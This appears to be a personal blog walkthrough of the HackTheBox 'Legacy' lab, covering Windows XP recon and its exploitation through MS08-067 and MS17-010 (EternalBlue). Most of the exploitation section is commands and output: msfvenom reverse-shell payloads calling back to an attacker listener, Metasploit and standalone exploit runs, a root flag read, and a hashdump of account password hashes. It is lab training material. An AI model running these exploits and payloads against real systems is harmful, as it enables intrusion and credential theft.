HackTheBox - Legacy Walkthrough

July 11, 2019

Legacy

Another easy box - this time Windows XP. It’s pretty straight forward - one can choose from 2 hight severity Windows SMB vulnerabilities to get to SYSTEM directly.

1. Recon and Information gathering

Nmap

root@warmachine:/hackthebox/legacy# nmap -sV -sC 10.10.10.4 -oN base_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-11 08:28 EEST
Nmap scan report for 10.10.10.4
Host is up (0.046s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h22m51s, deviation: 2h07m16s, median: 4d22h52m51s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b4:dd:df (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-07-16T10:21:20+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 262.76 seconds

SERVICES

SMB

Since it’s an older Windows machine, named Legacy I expect some loot here :P

root@warmachine:/hackthebox/legacy# nmap --script smb-vuln* -p 139 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-11 08:35 EEST
Nmap scan report for 10.10.10.4
Host is up (0.041s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Whisle… cool, cool - I have 2 RCE vulns via SMB only:

root@warmachine:/hackthebox/legacy# searchsploit  MS08-067
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)                                                               | exploits/windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067)                                                                                | exploits/windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067)                                                                          | exploits/windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)                                           | exploits/windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067)                                                                      | exploits/windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)                                                                      | exploits/windows/remote/7132.py
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
root@warmachine:/hackthebox/legacy# searchsploit ms17-010
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)           | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                       | exploits/windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                    | exploits/windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                          | exploits/windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                                       | exploits/windows_x86-64/remote/41987.py
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

Eh.. searchsploit isn’t my best bet I think.. I’ll do some googling for exploits for WinXP 32bit.

2. Exploiting

MS08-067

Manual script + meterpreter listener

I tried this script https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py and generated a payload with msfvenom (as per the instructions in the comments):

root@warmachine:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4949  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

And after that replaced the generated shell code in the script, started a listener and tried couple of versions - bricking and restoring the box couple of times :D

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > set LPORT 4949
LPORT => 4949
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.25:4949 
msf5 exploit(multi/handler) > 

root@warmachine:/hackthebox/legacy# python ms08-067.py 10.10.10.4 6 445

[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.25:4949 -> 10.10.10.4:1031) at 2019-07-11 21:41:42 +0300

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

meterpreter > shell
Process 1976 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>echo %USERNAME%
echo %USERNAME%
LEGACY$

C:\WINDOWS\system32>type c:\"documents and settings"\Administrator\desktop\root.txt
type c:\"documents and settings"\Administrator\desktop\root.txt
<...>

Eh.. that was easy.. Let’s try the msfconsole way

Not that it’s much different but still:

Metasploit

msf5 exploit(multi/handler) > search MS08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf5 exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf5 exploit(windows/smb/ms08_067_netapi) > set exitonsession false
exitonsession => false
msf5 exploit(windows/smb/ms08_067_netapi) > set LPORT 4949
LPORT => 4949
msf5 exploit(windows/smb/ms08_067_netapi) > exploit -j
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.25:4949 
msf5 exploit(windows/smb/ms08_067_netapi) > [*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.25:4949 -> 10.10.10.4:1031) at 2019-07-11 20:29:01 +0300

msf5 exploit(windows/smb/ms08_067_netapi) > sessions 1
[*] Starting interaction with 1...

MS17-010

After googling a bit I’ve stumbled on this post: https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/ which is exactly what I’m searching for. To summarize:

root@warmachine:/hackthebox/legacy# git clone https://github.com/helviojunior/MS17-010.git
Cloning into 'MS17-010'...
remote: Enumerating objects: 202, done.
remote: Total 202 (delta 0), reused 0 (delta 0), pack-reused 202
Receiving objects: 100% (202/202), 118.50 KiB | 202.00 KiB/s, done.
Resolving deltas: 100% (115/115), done.

root@warmachine:/hackthebox/legacy# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4949 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exeNo encoder or badchars specified, outputting raw payload
Payload size: 362 bytes
Final size of exe file: 73802 bytes
Saved as: ms17-010.exe

root@warmachine:/hackthebox/legacy# cp ms17-010.exe MS17-010/

root@warmachine:/hackthebox/legacy/MS17-010# python send_and_execute.py 10.10.10.4 ms17-010.exe 
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x82012988
SESSION: 0xe21bd5b8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe21a8398
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21a8438
overwriting token UserAndGroups
Sending file QSKI2S.exe...
Opening SVCManager on 10.10.10.4.....
Creating service fnZQ.....
Starting service fnZQ.....
The NETBIOS connection with the remote host timed out.
Removing service fnZQ.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

msf5 exploit(multi/handler) > 
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 2 opened (10.10.14.25:4949 -> 10.10.10.4:1031) at 2019-07-11 23:02:35 +0300

msf5 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

I know, I know - I’m a skiddie, but hey.. EternalBlue is way above my head to actually understand it :( - at least for now.

Interesting thing I noticed is when used meterpreter’s hashdump:

meterpreter > hashdump
Administrator:500:b47234f31e261b47587db580d0d5f393:b1e8bd81ee9a6679befb976c0b9b6827:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:0ca071c2a387b648559a926bfe39f8d7:332e3bd65dbe0af563383faff76c6dc5:::
john:1003:dc6e5a1d0d4929c2969213afe9351474:54ee9a60735ab539438797574a9487ad:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:f2b8398cafc7174be746a74a3a7a3823:::

So some hashes? What’s so interesting here? Well I noticed the SUPPORT_388945a0 user - I know I’ve seen this somewhere! After thinking for a minute I remembered: Mitre’s ATT&CK - APT3/Gothic Panda - https://attack.mitre.org/techniques/T1136/ - one of their persistance tactics was adding this user as a local admin! :) Guess it’s some kind of a easter egg? Not sure but I like it!

Another easy box down! :) Off to the next one!